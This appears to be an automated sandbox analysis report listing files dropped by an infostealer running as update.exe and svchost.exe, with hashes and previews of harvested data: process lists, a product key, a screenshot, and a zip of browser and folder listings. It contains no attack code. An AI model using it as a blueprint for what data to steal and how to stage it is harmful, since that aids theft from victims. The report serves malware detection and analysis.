                                                  Preview:JDDHMPCDUJFORBKGTIFQHFPQNEKFAIHGBDYZBWNZMVTSZXTGRUOCZPQRXMGXBNMAHGODCTVNAHQHZMJYIYXLTVDMEAVEXSWFQCDVPRSSLREITYMWHUXVVKLPJXQJOHYPAVYXSIMBBOTIWYDKNCDVKZZMEIFEDNNXHAHMYLPOUGNKMPZVDEQRUPZBQCKZDQINFECCUZINROAFGLIAMVWHXPPXOWZMWTITWBJFIENEHRXRHRPVUAIUAJUYDBBSQQMTJJXOAAMHVKJEOIQRSNKKQSGCHAUKUYPJEBZIGZTVKUXZEQOUSZPQBHKFHECDNFGTGIDHSJFVLAKZPDYVJVWECRIKKUCCFNNHBLBFCJEKSUZTITTTLQVOHKFHXFIIYDOZNAIBCDIRXJAYKHCOEXBOGSGEGGQEMHFXIZREOFZJSAFXTGSSZLVKYOANMZNPNESDZMFYWTZHIKUSMZXACWZEIMGTFRSZCGICPOSTZRECQYWZECQVLAWXESWPCDXLHIMJHSZJSDAXNXHETAWLZDXTZAPKBHSMKMYYGVSJCUIJSIFUHHMPIRBASPUOUXKKPQCECQBBZUSIXEOXLFFSQIFCTAIRASCMWEHFOXGEJRXFGJODUTKITHEAKFFJQTQNWWKXXDELWDHHEDWUTMSLXQJPVGOBKELYSRBQFYKXFHWGSCVLTCFKOEJMLUXIZVDPFHXHTSMTDRTVCNLISGJFVQRUTMZDYPUYBAEASZCSEUVHWRIQDEJIZQQHJNTIIICFMMPVLXOIVTPCTDKFPDVWXSBXZDXFUMBJTJMKOOHIMIOAKEJSIDIOJSRMRYXLDVGDBBYXARBNHXOXMBXYOTEFOAXRAUKXTWKYYGWNAHHCIIKQHYAETGBWABTEMJKNTEUQAWGHRIKDGGNHUIVVPPYPYTZERZKDPLUSIKPBDPJOCBYQJDEKAVQKHFTPBZJQOUCVBHAHZZGEXOCYGYDCZICBOETRSJSMVEZKINDRIKZYTUIS
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.6998645060098685
                                                  Encrypted:false
                                                  SSDEEP:24:FzrJLVfPTlXwAGfwXz0vRDC0aYECjYTixDXXwDyDFdJCSuHFF03T:FRLVHTlXwAGEoVCRYF0EDXgDVFHUj
                                                  MD5:1676F91570425F6566A5746BC8E8427E
                                                  SHA1:0F922133E2BEF0B48C623BEFA0C77361F6FA3900
                                                  SHA-256:534233540B43C2A72D09DBF93858ECD7B5F48376B69182EDBCA9983409F21C87
                                                  SHA-512:07D3CA8902964865FE9909054CF90DA1852678FBE58B1C0A8C2DBA2359A16DCBD43F23142D957DB9C1A8C2A1811EF4FEA74B0016A6F469538366B4FF01C8A146
                                                  Malicious:false
                                                  Preview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
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.6998645060098685
                                                  Encrypted:false
                                                  SSDEEP:24:FzrJLVfPTlXwAGfwXz0vRDC0aYECjYTixDXXwDyDFdJCSuHFF03T:FRLVHTlXwAGEoVCRYF0EDXgDVFHUj
                                                  MD5:1676F91570425F6566A5746BC8E8427E
                                                  SHA1:0F922133E2BEF0B48C623BEFA0C77361F6FA3900
                                                  SHA-256:534233540B43C2A72D09DBF93858ECD7B5F48376B69182EDBCA9983409F21C87
                                                  SHA-512:07D3CA8902964865FE9909054CF90DA1852678FBE58B1C0A8C2DBA2359A16DCBD43F23142D957DB9C1A8C2A1811EF4FEA74B0016A6F469538366B4FF01C8A146
                                                  Malicious:false
                                                  Preview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
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.696508269038202
                                                  Encrypted:false
                                                  SSDEEP:24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
                                                  MD5:0E9E92228B27AD7E7B4449467A529B0C
                                                  SHA1:209F92CDFC879EE2B98DEF315CCE166AFEC00331
                                                  SHA-256:284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
                                                  SHA-512:CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
                                                  Malicious:false
                                                  Preview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
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.696508269038202
                                                  Encrypted:false
                                                  SSDEEP:24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
                                                  MD5:0E9E92228B27AD7E7B4449467A529B0C
                                                  SHA1:209F92CDFC879EE2B98DEF315CCE166AFEC00331
                                                  SHA-256:284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
                                                  SHA-512:CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
                                                  Malicious:false
                                                  Preview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
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.6959554225029665
                                                  Encrypted:false
                                                  SSDEEP:24:TifvYKkubZMu3HGRW2lJUao1nH5o4WGAZ46:rKkmZMuklJUj+GAZ46
                                                  MD5:DCABA2748DFEAEF0BFBC56FD9F79315C
                                                  SHA1:B87FBA690A774893B22B9F611DFDCB5CDC520269
                                                  SHA-256:86DF5957E0CD2EBDFC2FF8C2F05569BA71462149042DF57ECE5E8228E3BC5DDD
                                                  SHA-512:65F10692D0AE5CBAADDB03E89D6CD1D3486429906437A17C2B1157BEDB069202B1DC52A4E864AA8F90B8CBD171FD2A3E150185BF7DFF81540E209B6A8F8829F3
                                                  Malicious:false
                                                  Preview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
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):282
                                                  Entropy (8bit):3.5191090305155277
                                                  Encrypted:false
                                                  SSDEEP:6:QyqRsioTA5wmHOlRaQmZWGokJqAMhAlt4DAlLwkAl2FlRaQmZWGokJISlVl9:QZsiL5wmHOlDmo0qmt4clLwr2FlDmo0d
                                                  MD5:3A37312509712D4E12D27240137FF377
                                                  SHA1:30CED927E23B584725CF16351394175A6D2A9577
                                                  SHA-256:B029393EA7B7CF644FB1C9F984F57C1980077562EE2E15D0FFD049C4C48098D3
                                                  SHA-512:DBB9ABE70F8A781D141A71651A62A3A743C71A75A8305E9D23AF92F7307FB639DC4A85499115885E2A781B040CBB7613F582544C2D6DE521E588531E9C294B05
                                                  Malicious:false
                                                  Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.9.8.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.8.4.....
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):190
                                                  Entropy (8bit):3.5497401529130053
                                                  Encrypted:false
                                                  SSDEEP:3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl6nM:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOy
                                                  MD5:D48FCE44E0F298E5DB52FD5894502727
                                                  SHA1:FCE1E65756138A3CA4EAAF8F7642867205B44897
                                                  SHA-256:231A08CABA1F9BA9F14BD3E46834288F3C351079FCEDDA15E391B724AC0C7EA8
                                                  SHA-512:A1C0378DB4E6DAC9A8638586F6797BAD877769D76334B976779CD90324029D755FB466260EF27BD1E7F9FDF97696CD8CD1318377970A1B5BF340EFB12A4FEB4A
                                                  Malicious:false
                                                  Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.2.1.8.2.4.....
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):190
                                                  Entropy (8bit):3.5497401529130053
                                                  Encrypted:false
                                                  SSDEEP:3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl3sY:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOO
                                                  MD5:87A524A2F34307C674DBA10708585A5E
                                                  SHA1:E0508C3F1496073B9F6F9ECB2FB01CB91F9E8201
                                                  SHA-256:D01A7EF6233EF4AB3EA7210C0F2837931D334A20AE4D2A05ED03291E59E576C9
                                                  SHA-512:7CFA6D47190075E1209FB081E36ED7E50E735C9682BFB482DBF5A36746ABDAD0DCCFDB8803EF5042E155E8C1F326770F3C8F7AA32CE66CF3B47CD13781884C38
                                                  Malicious:false
                                                  Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.3.4.5.8.3.....
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):504
                                                  Entropy (8bit):3.514398793376306
                                                  Encrypted:false
                                                  SSDEEP:12:QZsiL5wmHOlDmo0qmalDmo0qmN4clLwr2FlDmo0IWFSklrgl2FlDmo0qjKA1:QCGwv4o0u4o0RhlLwiF4o0HUsF4o01A1
                                                  MD5:29EAE335B77F438E05594D86A6CA22FF
                                                  SHA1:D62CCC830C249DE6B6532381B4C16A5F17F95D89
                                                  SHA-256:88856962CEF670C087EDA4E07D8F78465BEEABB6143B96BD90F884A80AF925B4
                                                  SHA-512:5D2D05403B39675B9A751C8EED4F86BE58CB12431AFEC56946581CB116B9AE1014AB9334082740BE5B4DE4A25E190FE76DE071EF1B9074186781477919EB3C17
                                                  Malicious:false
                                                  Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.9.....I.n.f.o.T.i.p.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.1.2.6.8.8.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.1.3.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.6.....
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):20373
                                                  Entropy (8bit):5.758571071070943
                                                  Encrypted:false
                                                  SSDEEP:96:+ttrT2Zs9LaCwdMqO23KxcnBg+7UBG8nqACwKB6r8JbE9rfKYO+k2:+ttrT0sNa1dkig50LACwu6wJbE9ri2
                                                  MD5:5C1B87FDD31967C04E040AED31273A89
                                                  SHA1:2039C3C7B2268B858D1E3F8257373FA5B87E25EF
                                                  SHA-256:3296CFCF82A1702CACE1401375C8D71AE9F411B784A595497A3896DC301106B9
                                                  SHA-512:F541A6DE71EDAA99FCF9B8894CFF5B344771086FF423D90D1AB3E349FA4539445F0644AC1FA8B20FC532A2E620BF132CF568B6B54884BB11B4D5080D5BF97406
                                                  Malicious:false
                                                  Preview:NAME: sppsvc..PID: 6464..EXE: ..NAME: svchost..PID: 2152..EXE: C:\Windows\system32\svchost.exe..NAME: MYLPLdHNTUihZLdXDCRQCWPdnQySg..PID: 4612..EXE: C:\Program Files (x86)\cmKvTzJpKsbrEIGaLAwiZeYXliSEcxsBNtmHkIOCPghdHoAkajJTeqmmVpgtiYFsz\MYLPLdHNTUihZLdXDCRQCWPdnQySg.exe..NAME: svchost..PID: 1716..EXE: C:\Users\user\AppData\Roaming\svchost.exe..NAME: MYLPLdHNTUihZLdXDCRQCWPdnQySg..PID: 3008..EXE: C:\Program Files (x86)\cmKvTzJpKsbrEIGaLAwiZeYXliSEcxsBNtmHkIOCPghdHoAkajJTeqmmVpgtiYFsz\MYLPLdHNTUihZLdXDCRQCWPdnQySg.exe..NAME: Windows Security Health Service..PID: 6024..EXE: C:\Users\user\AppData\Roaming\Windows Security Health Service.exe..NAME: csrss..PID: 420..EXE: ..NAME: backgroundTaskHost..PID: 4292..EXE: C:\Windows\system32\backgroundTaskHost.exe..NAME: MYLPLdHNTUihZLdXDCRQCWPdnQySg..PID: 2136..EXE: C:\Program Files (x86)\cmKvTzJpKsbrEIGaLAwiZeYXliSEcxsBNtmHkIOCPghdHoAkajJTeqmmVpgtiYFsz\MYLPLdHNTUihZLdXDCRQCWPdnQySg.exe..NAME: svchost..PID: 5152..EXE: C:\Windows\system32\svchos
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):29
                                                  Entropy (8bit):3.935398667466764
                                                  Encrypted:false
                                                  SSDEEP:3:j9uyhIS+9m10D:BJZO
                                                  MD5:26091DB69F4A36FA295BE96E9040370F
                                                  SHA1:DFF23596F870E947521D853E896D92C88324FFE8
                                                  SHA-256:1D5640C0191BECDEADD9BE417100194CE6A028DCAC24979852A8FDC72CC7037A
                                                  SHA-512:8F4ED9781DDC5D787D575B3C854A0730671A78B438A59555F597FBB2869C2E2F264BB1B070358F9635A04F3488D3EE5A709651FAA95B4DD450464F5EC1C53FF3
                                                  Malicious:false
                                                  Preview:97XK9-N6YTD-7JJJ3-RCCP6-82GJ7
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):84
                                                  Entropy (8bit):4.6630509827051725
                                                  Encrypted:false
                                                  SSDEEP:3:PHsEiVboFkaQXMtS1ME/M2en:PsEwYVQXOS1TUn
                                                  MD5:58CD2334CFC77DB470202487D5034610
                                                  SHA1:61FA242465F53C9E64B3752FE76B2ADCCEB1F237
                                                  SHA-256:59B3120C5CE1A7D1819510272A927E1C8F1C95385213FCCBCDD429FF3492040D
                                                  SHA-512:C8F52D85EC99177C722527C306A64BA61ADC3AD3A5FEC6D87749FBAD12DA424BA6B34880AB9DA627FB183412875F241E1C1864D723E62130281E44C14AD1481E
                                                  Malicious:false
                                                  Preview:Active code page: 65001..The Wireless AutoConfig Service (wlansvc) is not running...
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):15168
                                                  Entropy (8bit):5.743427958844179
                                                  Encrypted:false
                                                  SSDEEP:48:BfERfEsfEYfEGfEXfELfEafEmfEsfEcfEMFfEOfEhfEIfE7fExfEVfEcfEpfEofD:8c9Kqt++h
                                                  MD5:8B231306977EBD952F46B82C046A7E99
                                                  SHA1:C6C7D2C3A5C7795DC4971CAA16CBD1907053DDB6
                                                  SHA-256:1968C4FC3ABED14EF916182DDD8472EA397596DA086AF0FCA9A894BA51CBD8B6
                                                  SHA-512:8A576849CCD143743380A2E2A44F58391A643589E985834D9A3A795A6E48AF229CB95B03C031F7F586F2D33503DB253552881820F827731FDD2533CCAA9FDF5E
                                                  Malicious:false
                                                  Preview:NAME: MYLPLdHNTUihZLdXDCRQCWPdnQySg..TITLE: New Tab - Google Chrome..PID: 4612..EXE: C:\Program Files (x86)\cmKvTzJpKsbrEIGaLAwiZeYXliSEcxsBNtmHkIOCPghdHoAkajJTeqmmVpgtiYFsz\MYLPLdHNTUihZLdXDCRQCWPdnQySg.exe..NAME: MYLPLdHNTUihZLdXDCRQCWPdnQySg..TITLE: New Tab - Google Chrome..PID: 3008..EXE: C:\Program Files (x86)\cmKvTzJpKsbrEIGaLAwiZeYXliSEcxsBNtmHkIOCPghdHoAkajJTeqmmVpgtiYFsz\MYLPLdHNTUihZLdXDCRQCWPdnQySg.exe..NAME: MYLPLdHNTUihZLdXDCRQCWPdnQySg..TITLE: New Tab - Google Chrome..PID: 2136..EXE: C:\Program Files (x86)\cmKvTzJpKsbrEIGaLAwiZeYXliSEcxsBNtmHkIOCPghdHoAkajJTeqmmVpgtiYFsz\MYLPLdHNTUihZLdXDCRQCWPdnQySg.exe..NAME: MYLPLdHNTUihZLdXDCRQCWPdnQySg..TITLE: New Tab - Google Chrome..PID: 6424..EXE: C:\Program Files (x86)\cmKvTzJpKsbrEIGaLAwiZeYXliSEcxsBNtmHkIOCPghdHoAkajJTeqmmVpgtiYFsz\MYLPLdHNTUihZLdXDCRQCWPdnQySg.exe..NAME: MYLPLdHNTUihZLdXDCRQCWPdnQySg..TITLE: New Tab - Google Chrome..PID: 5988..EXE: C:\Program Files (x86)\cmKvTzJpKsbrEIGaLAwiZeYXliSEcxsBNtmHkIOCPghdHoAkajJTeqmm
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                                  Category:dropped
                                                  Size (bytes):96299
                                                  Entropy (8bit):7.851495961295097
                                                  Encrypted:false
                                                  SSDEEP:1536:COm0uT7hBWKeiJmfLtDFzUG0INKRCHVvTRaBKienvAHt3Tm2SmqdYak+OLS6:Xpti0PzTnNzHbikAHRTQBZX2
                                                  MD5:6AEF9BD3751EBB22DCE5F6772FC14C4E
                                                  SHA1:8B51AE657AA2453D2D676F1160D77C798335D986
                                                  SHA-256:E74D1F406B4F394B4CE27A9ED21B96B475B154A8D38E9CE3106C323CBEB6B117
                                                  SHA-512:DB643B5C4822D89948FC338901036F99B155259BDA8464C1B72BB593719672B5AC53E90DABC9C953B523944E123264A6103015893D887F7EC4B435225CB284BD
                                                  Malicious:false
                                                  Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(..?3.*..m..,.X.c.#....O.*.i.....w...._.#.z..p.....MR...%.f..r.....Uf.....?.2......S.]9o..s......T..W6.y.:.....CPWJi......%-....Z(.(..o.<-...OF.....j.#?........x..........#..........9.+..........e\.../n-.n.dh.c...k....1.q...y5..r..N.)W...O.d.QEw.!E.P11E-v.....Z..tN.Lo..?.Xb1....Oc....&...W.8.+.?.]._.....G.R....n..............z...........w..#.......`..
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                  Category:modified
                                                  Size (bytes):160371
                                                  Entropy (8bit):7.930026562248578
                                                  Encrypted:false
                                                  SSDEEP:3072:6Z6xL58ZtKJ2It/QeSn/+XbOB24dK35H+h/7Jq:b/QF/CbX/5H+h/7o
                                                  MD5:86FFCFAFBF9D96DBCF9A3E4CA4F260F5
                                                  SHA1:20BF1FF6C55D317DE4E68A74F3CA4C974ACF66C0
                                                  SHA-256:596E5DB2063045E1BD1525BF80A317D0E06A9BF9BEE713BB99522C12A99566EF
                                                  SHA-512:0E5A01E4D7CBEA29A4D096CD8BACE9FF352E3B214BA6030271041FB847393754216362257DEC1B83E09ED2F45EC4616334DFC4FF9C86CE056D675255CCEDBFA1
                                                  Malicious:false
                                                  Preview:PK.........(#Y................Browsers\Edge\PK.........(#Y................Browsers\Google\PK..........#Yc.e.S...^.......Browsers\Firefox\History.txtSVVVp.,JM.P.(.,KL.T../.LNUx.0E.7.*3''QA..L#.....J_...\/.".._........_....1M_S....PK..........#Y0...5...........Directories\Desktop.txteR.r. .>.3}..}..A..P...-.N.k.I.>~...7wG..%.......o.b..&..rS...6qi...ab..U 5..O.y....e.WT44.Y.......kK.$!...g....T....?.g2.rfp...{.p....Gb..FS.h.7!$>JLL..n.z$.Xz*L*.'h........K.0..6.tC....M.OHA.....,,y..@.@....<....mk.'.q...HYx+,x&.O....$...7..B.Q7u._.6.....{ .4....*........}N........:.[.J.<.......PK..........#Y.+>.d...........Directories\Documents.txtm.Kn.0...T..r.6=...Gl..K.D@+.$..T..+..P..g...G}};....}..RH*....[..........<w....~y&.M_.'.J.p.y./$)*...r..a*.ey.p......;QB..m}.4.i.G....Q"..Rb\J.7@...T`.\.5J.!..U!.f...,r.J...$...R.M"Y...T.(..Jq.T...g....fl.....vw../......Z...^...?..x.n....[.N..Y.......L.f"u.t..r........p...r....3O.1.1ACOkK.p.sE...................].G...\...5.5.....
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:Unicode text, UTF-8 text
                                                  Category:dropped
                                                  Size (bytes):94
                                                  Entropy (8bit):4.886397362842801
                                                  Encrypted:false
                                                  SSDEEP:3:RGEnGPHA9lfMJJEFAN2DSLvIJiMhKVX3L2WdXuvn:DG/CF0EFAN2OLciA8d+v
                                                  MD5:61CDD7492189720D58F6C5C975D6DFBD
                                                  SHA1:6966AFE0DEC5B0ABD90291FA12C0F6B7EF73ED43
                                                  SHA-256:2F345865397FF1952921DB0588A6B589BAF30E67A90E11F7064E515AC162E862
                                                  SHA-512:20D5A1C9809DF4F5B9C789042E5B88928A5246F9EB44F9D265CA3AA6FC9544A582B758ECAF6BBB0E9CEE149BD0AAC5E6C63D954541D1B23A7FC11894121CC0AE
                                                  Malicious:false
                                                  Preview:### Firefox Privacy Notice . Mozilla ### (https://www.mozilla.org/en-US/privacy/firefox/) 1.
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):814
                                                  Entropy (8bit):5.23736360478791
                                                  Encrypted:false
                                                  SSDEEP:24:ChXIYyFteIqxj3Cvj8zSYCE19tDvTPupjucWjq:cXIYseIqxj3CQzSZE19tDrPupjuljq
                                                  MD5:1B0D52E28F02B57E0D1C044E42C567A7
                                                  SHA1:F5D7EFB021881DC867CAEA4EE99597D592B60B30
                                                  SHA-256:1E5407FDF60271E55C10CAB6252CF4706DAFE25AE144D80823F5FCDD372BBB1E
                                                  SHA-512:B5AC9573931BE5E905942FB228655B781285DBDF519E8174F3D772793AD37C82F284CF960EDC7E9B4B64ED535A75A039ED46D7E5F34EE93EE14B2514CBF2C8CF
                                                  Malicious:false
                                                  Preview:Desktop\...DUUDTUBZFW\...EEGWXUHVUG\....BJZFPPWAPT.png....EEGWXUHVUG.docx....EFOYFBOLXA.pdf....GRXZDKKVDB.jpg....NVWZAPQSQL.xlsx....PALRGUCVEH.mp3...EFOYFBOLXA\....EFOYFBOLXA.docx....GIGIYTFFYT.jpg....JDDHMPCDUJ.png....PALRGUCVEH.xlsx....ZGGKNSUKOP.pdf....ZIPXYXWIOY.mp3...EOWRVPQCCS\...GLTYDMDUST\...LIJDSFKJZG\...NVWZAPQSQL\....EIVQSAOTAQ.png....EOWRVPQCCS.jpg....GIGIYTFFYT.mp3....GRXZDKKVDB.xlsx....NVWZAPQSQL.docx....PALRGUCVEH.pdf...QCOILOQIKC\...TQDFJHPUIU\...BJZFPPWAPT.png...BTC.exe...desktop.ini...EEGWXUHVUG.docx...EFOYFBOLXA.docx...EFOYFBOLXA.pdf...EIVQSAOTAQ.png...EOWRVPQCCS.jpg...Excel.lnk...GIGIYTFFYT.jpg...GIGIYTFFYT.mp3...GRXZDKKVDB.jpg...GRXZDKKVDB.xlsx...JDDHMPCDUJ.png...NVWZAPQSQL.docx...NVWZAPQSQL.xlsx...PALRGUCVEH.mp3...PALRGUCVEH.pdf...PALRGUCVEH.xlsx...ZGGKNSUKOP.pdf...ZIPXYXWIOY.mp3..
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):946
                                                  Entropy (8bit):5.374016320731802
                                                  Encrypted:false
                                                  SSDEEP:24:QJhXIYyFteIqxj38xrqEEnvj8zSYCZ9tDvupjucWjq:Q7XIYseIqxj38BqEEnQzSZZ9tDmpjulu
                                                  MD5:7ECFE495FA4D93F25F904F0648C039A2
                                                  SHA1:3153CAE93B272237914852A85357F744328099F9
                                                  SHA-256:A0BA8E7E4D12DA4A13DF2B425F2BD3D2C72CC94795F74E0E2284A7F8F3213FBC
                                                  SHA-512:804589825EC34F9C8B028295EC33BE926F41F0F31B9E2D9DBED3B452515170B78318C1F90BE97C28E9FFCE5DD31DBC6CE60BE2192AA64870FC220017A6C78CED
                                                  Malicious:false
                                                  Preview:Documents\...DUUDTUBZFW\...EEGWXUHVUG\....BJZFPPWAPT.png....EEGWXUHVUG.docx....EFOYFBOLXA.pdf....GRXZDKKVDB.jpg....NVWZAPQSQL.xlsx....PALRGUCVEH.mp3...EFOYFBOLXA\....EFOYFBOLXA.docx....GIGIYTFFYT.jpg....JDDHMPCDUJ.png....PALRGUCVEH.xlsx....ZGGKNSUKOP.pdf....ZIPXYXWIOY.mp3...EOWRVPQCCS\...GLTYDMDUST\...LIJDSFKJZG\...My Music\....desktop.ini...My Pictures\....Camera Roll\.....desktop.ini....Saved Pictures\.....desktop.ini....desktop.ini...My Videos\....desktop.ini...NVWZAPQSQL\....EIVQSAOTAQ.png....EOWRVPQCCS.jpg....GIGIYTFFYT.mp3....GRXZDKKVDB.xlsx....NVWZAPQSQL.docx....PALRGUCVEH.pdf...QCOILOQIKC\...TQDFJHPUIU\...BJZFPPWAPT.png...desktop.ini...EEGWXUHVUG.docx...EFOYFBOLXA.docx...EFOYFBOLXA.pdf...EIVQSAOTAQ.png...EOWRVPQCCS.jpg...GIGIYTFFYT.jpg...GIGIYTFFYT.mp3...GRXZDKKVDB.jpg...GRXZDKKVDB.xlsx...JDDHMPCDUJ.png...NVWZAPQSQL.docx...NVWZAPQSQL.xlsx...PALRGUCVEH.mp3...PALRGUCVEH.pdf...PALRGUCVEH.xlsx...ZGGKNSUKOP.pdf...ZIPXYXWIOY.mp3..
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):338
                                                  Entropy (8bit):5.296247378390472
                                                  Encrypted:false
                                                  SSDEEP:6:3tcfL6LK0rcNCNWtrB/rvwuuth7kyRh7Wdtslddjgljif/upCWM08NV3:aj6LK0rcNuCt/rvwu6puGdejif/upCWu
                                                  MD5:278EAC32E0DD3806E5F3F391B184947F
                                                  SHA1:618EE22D5D93F252BCEF6EF802F1E97A36B0C445
                                                  SHA-256:788B0C56CAD0EDC8D5AA74B8A4AA971320E9DF9F5DD8602977AA2656096AE179
                                                  SHA-512:4F0386BB38707BF5442D0F5E1DB4B5ACE6A4AD49036FFEAFACF241ABDF2F2EEB15FF350DEC59AFB6BBF078D5288B6D161F46A05AB45956A0E19E05B5AD2A4F84
                                                  Malicious:false
                                                  Preview:Downloads\...BJZFPPWAPT.png...desktop.ini...EEGWXUHVUG.docx...EFOYFBOLXA.docx...EFOYFBOLXA.pdf...EIVQSAOTAQ.png...EOWRVPQCCS.jpg...GIGIYTFFYT.jpg...GIGIYTFFYT.mp3...GRXZDKKVDB.jpg...GRXZDKKVDB.xlsx...JDDHMPCDUJ.png...NVWZAPQSQL.docx...NVWZAPQSQL.xlsx...PALRGUCVEH.mp3...PALRGUCVEH.pdf...PALRGUCVEH.xlsx...ZGGKNSUKOP.pdf...ZIPXYXWIOY.mp3..
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):25
                                                  Entropy (8bit):4.023465189601646
                                                  Encrypted:false
                                                  SSDEEP:3:1hiR8LKB:14R8LKB
                                                  MD5:966247EB3EE749E21597D73C4176BD52
                                                  SHA1:1E9E63C2872CEF8F015D4B888EB9F81B00A35C79
                                                  SHA-256:8DDFC481B1B6AE30815ECCE8A73755862F24B3BB7FDEBDBF099E037D53EB082E
